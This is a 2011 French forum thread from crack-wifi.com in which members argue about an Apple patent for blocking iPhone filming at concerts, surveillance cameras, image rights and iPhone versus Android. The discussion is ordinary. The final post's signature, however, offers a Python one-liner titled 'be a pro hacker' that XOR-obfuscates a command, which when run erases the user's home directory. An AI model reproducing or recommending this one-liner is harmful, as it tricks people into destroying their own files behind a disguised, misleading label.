Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 22-06-2011 19:29:43

noireaude
Membre d'honneur
Lieu : Chez le docteur
Site Web

Le Troll de la semaine : l'iPhone et le blocage de la vidéo

Oui et non mais bon ?...

Le Troll de la semaine : l'iPhone et le blocage de la vidéo

Par contre nous on se fait filmer de partout sans avoir notre mot à dire.
L'idée n'est pas mauvaise mais il faudrait également entamer une réflexion sur le droit à l'image du citoyen et interdire la vidéo dans les lieux publics dans ce cas.
Je ne vois pas en quoi il est nécessaire de me filmer quand je suis en train de d'acheter mes caleçons.

Ah oui c'est pour ton bien mon fils ....

C'est quand même gênant de savoir que pour une raison X ou Y on peut envisager de brider un appareil sans qu'on ait notre mot à dire.
Car si cela se fait pour un iPhone pourquoi au final ne pas le faire de manière plus général. Et ils le feront sans aucun doute.

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 22-06-2011 20:19:45

konik
Membre d'Or
Lieu : 127.0.0.1

Re : Le Troll de la semaine : l'iPhone et le blocage de la vidéo

Non mais c'est fou ça ! Tu veux filmer la chorale de ton gosse à la fête de fin d'année, avec pleins de parents devant toi, et là ton iphone te dit "NON, tu ne filmeras pas ton gamin lol "
Bientôt les caméras et smartphones auront un logiciel de filtrage agréé par le gouvernement te disant ce que tu as le droit de filmer
C'est un peu comme si t'achète une bagnole neuve et que le constructeur ou le concessionnaire t'interdit d'emprunter certains types de routes!!!!
Et puis je vois pas où fimer des vidéos de concert avec un son dégueulasse et une image pixellisée pose problème aux ayants droits parce que filmer avec un iphone........ 
Encore juste une histoire de gros sous où Apple va encore se gaver
Sacré Ipapy!

$! \/0(_)$ |*0uv32 1!r3 [3c!, c'357 q(_)3 v0(_)$ 4v32 vr4!|\/|3n7 83$0!n d3 |\|!qu3r

#3 22-06-2011 21:19:30

noireaude
Membre d'honneur
Site Web

Oui c'est sur que c'est avant tout pour eux une histoire de gros sous, vu que leur système vise leurs appareils.
Il ne faut pas s'arrêter à ça en revanche, mais plutôt  sur le fait que puisse brouiller ton appareil de façon externe.

Si tu achètes un périphérique dont les possibilités sont bridées, c'est ton problème.
Que cela se fasse contre ton grès en revanche n'est pas normal.
Ca se fait déjà dans pas mal de cinémas. M'en fiche de toute façon je n'y vais plus mais quand même.

Prenons maintenant le cas d'un concert ou d'une représentation quelconque.

Certains vont filmer l'artiste ou enregistrer une chanson.

A ce titre on voudrait m'ôter le droit de prendre une photo de ma copine ou de mes amis pendant le concert pour en garder un souvenir.
Et pour se faire on va se donner le droit de brouiller tout ou en partie mon portable, iPhone ou autre.

La je ne suis pas d'accord.
Je ne vois pas en quoi le manque de civisme d'une minorité de gens doit me pénaliser moi aussi alors que je ne fais rien de mal.

Je suis contre d'une part car je ne suis plus en mesure d'utiliser mon appareil de manière responsable.

Mais également et surtout car je trouve injuste que tout soit mis en oeuvre pour protéger l'image et les intérêts de personnages qui se disent et se veulent publiques.
Alors que dans le même temps on mitraille Madame Michu de son domicile à son magasin de lingerie préférée sans que celle-ci ne puisse rien y faire.

Essayez de vous rendre dans un endroit muni de vidéo surveillance et de demander à un responsable de pouvoir visionner les images de vous qui on étés prises pendant vos courses.
Vous allez vous faire jeter plus de neuf fois sur dix alors que c'est votre droit.
La loi, la cnil, est très claire la dessus.
L'écriteau à l'entrée des magasin avec le décret inscrit dessus aussi.

J'estime à ce titre que si un commerçant ou autre peut se donner arbitrairement le droit me refuser l'accès aux données me concernant.
Alors je dois pouvoir défendre au même titre qu'un artiste et empêcher que celui-ci me filme sans mon autorisation.

Si mon téléphone peut être bridé par un tiers pour protéger son image et les droits d'auteurs.
Je veux pouvoir pour les même raisons brouiller les caméras qui me filment si les responsables me refusent l'accès aux données me concernant.

Je ne vois pas en quoi le fait d'être anonyme me priverait de mon droit à l'image si d'un autre côté on peut me torpiller mon portable ici ou la arbitrairement.

NB: J'utilise le terme "manque" de civisme pour l'exemple, mais je considère que les artistes on largement de quoi s'auto produire de nos jours.
Ceux qui ne le font pas méritent de toute façon ce qui leur arrive, mais ce n'est que mon avis, cela n'engage que moi.

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

#4 23-06-2011 17:21:26

rcv1337
Membre Actif

Honnêtement, j'ai bien hâte de voir comment cette application va fonctionner.. ! Si elle va être efficace, et surtout, de voir les moyens de contourner cette technologie de merde. Avec la secte qu'est Apple, j'aurais présentement pratiquement honte d'avoir un Iphone sur moi.

J'ai eu un pod Touch 4, je l'es payé 300$, il était tout beau, tout neuf.
Vous savez quoi ? il y a aucun partage de fichier via BlueTooth !
J'ai un Nokia qui ma coûté 35$ et supporte super bien le transfert de
fichier via BlueTooth. Mais pas le machin de 300$. Bordel.
Sans doute car ils sont trop lâche pour essayer de faire quelque chose
de sécuritaire.

Personnellement je trouve cela idiot, comme vous dites, je peut vouloir filmer autre chose que le concert.
Et c'est MON DROIT de filmer mon ami entrain de ce rentrer un Iphone dans le c*l et ce même dans un
concert des jonas brothers.

+1 pour Android finalement.

arrg

Dernière modification par rcv1337 (23-06-2011 17:23:56)

#5 23-06-2011 17:27:17

toto
Membre V.I.P.
Lieu : chez le docteur aussi

rcv1337 a écrit :

filmer mon ami entrain de ce rentrer un Iphone dans le c*l

MDR ça pourrais encore leurs faire de la pub smile

#6 23-06-2011 17:54:13

konik
Membre d'Or
Lieu : 127.0.0.1

Mais ca doit faire mal quand meme lol

$! \/0(_)$ |*0uv32 1!r3 [3c!, c'357 q(_)3 v0(_)$ 4v32 vr4!|\/|3n7 83$0!n d3 |\|!qu3r

#7 23-06-2011 18:58:12

noireaude
Membre d'honneur
Site Web

rcv1337 a écrit :

Honnêtement, j'ai bien hâte de voir comment cette application va fonctionner.. ! Si elle va être efficace, et surtout, de voir les moyens de contourner cette technologie de merde. Avec la secte qu'est Apple, j'aurais présentement pratiquement honte d'avoir un Iphone sur moi.

J'ai eu un pod Touch 4, je l'es payé 300$, il était tout beau, tout neuf.
Vous savez quoi ? il y a aucun partage de fichier via BlueTooth !
J'ai un Nokia qui ma coûté 35$ et supporte super bien le transfert de
fichier via BlueTooth. Mais pas le machin de 300$. Bordel.
Sans doute car ils sont trop lâche pour essayer de faire quelque chose
de sécuritaire.

Personnellement je trouve cela idiot, comme vous dites, je peut vouloir filmer autre chose que le concert.
Et c'est MON DROIT de filmer mon ami entrain de ce rentrer un Iphone dans le c*l et ce même dans un
concert des jonas brothers.

+1 pour Android finalement.

arrg

Bon de toute façon il faut attendre, un brevet n'est qu'un brevet rien de dit au final que cela sera mis en en oeuvre dans les faits.

Pour le coup du bluetooth c'est inadmissible dans les faits, mais c'est la politique maison, rien à voir avec la sécurité.
J'ai récupéré un iPhone pour voir quand même à quoi ça ressemblait ces machins la (à titre d'info je précise hein !!!!).
J'ai été coqué de constater ça dans un premier temps mais pas franchement étonné.
L'interopérabilité chez Apple se résume à leur matériel, c'est pas nouveau je le savais déjà.

Je suis vraiment effaré par cette politique d'autant plus qu'on est quand même forcé de reconnaitre que techniquement l'appareil en lui même est une merveille de technologie.

Je trouve vraiment dommage qu'ils aient de si beaux produits pour faire de la merde avec sous des prétextes marketing.

+1 pour Android aussi mais je me demande quand même si choisir entre Google ou Apple ne revient pas fondamentalement au même.

Pour l'Iphone dans le c.*, ben Aïe quoi lol (Surtout la version 4 qui est bien carrée).

#8 23-06-2011 20:33:11

rcv1337
Membre Actif

Très d'accord avec toi. Les produits d'Apple son de bonne qualité, malheureusement, c'est la partie logiciel qui fait tout foiré en ce qui concerne l'Iphone.

Personnellement, j'ai eu à choisir entre Google et Apple.. si ont peut appeler ça choisir car il y avait déjà une croix sur l'Iphone dans ma tête. J'ai acheté un Nexus S, et je suis un homme heureux.

La qualité matérielle du Iphone avec Android 2.3 en OS serait finalement un mixe idéal. Néanmoins, j'ai rien à dire pour la qualité de mon Nexus S, mais Apple a quand même un grand pas de fait en ce qui concerne l'esthétique de leurs machines.

#9 23-06-2011 20:41:32

noireaude
Membre d'honneur
Site Web

rcv1337 a écrit :

Apple a quand même un grand pas de fait en ce qui concerne l'esthétique de leurs machines.

Oui il faut leur laisser, c'est ce qui fait leur force.

#10 23-06-2011 21:31:56

spawn
Modérateur

Ca me rapelle un film avec Will Smith qui dézingue du robot à tour de bras..

iRobot

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Annonce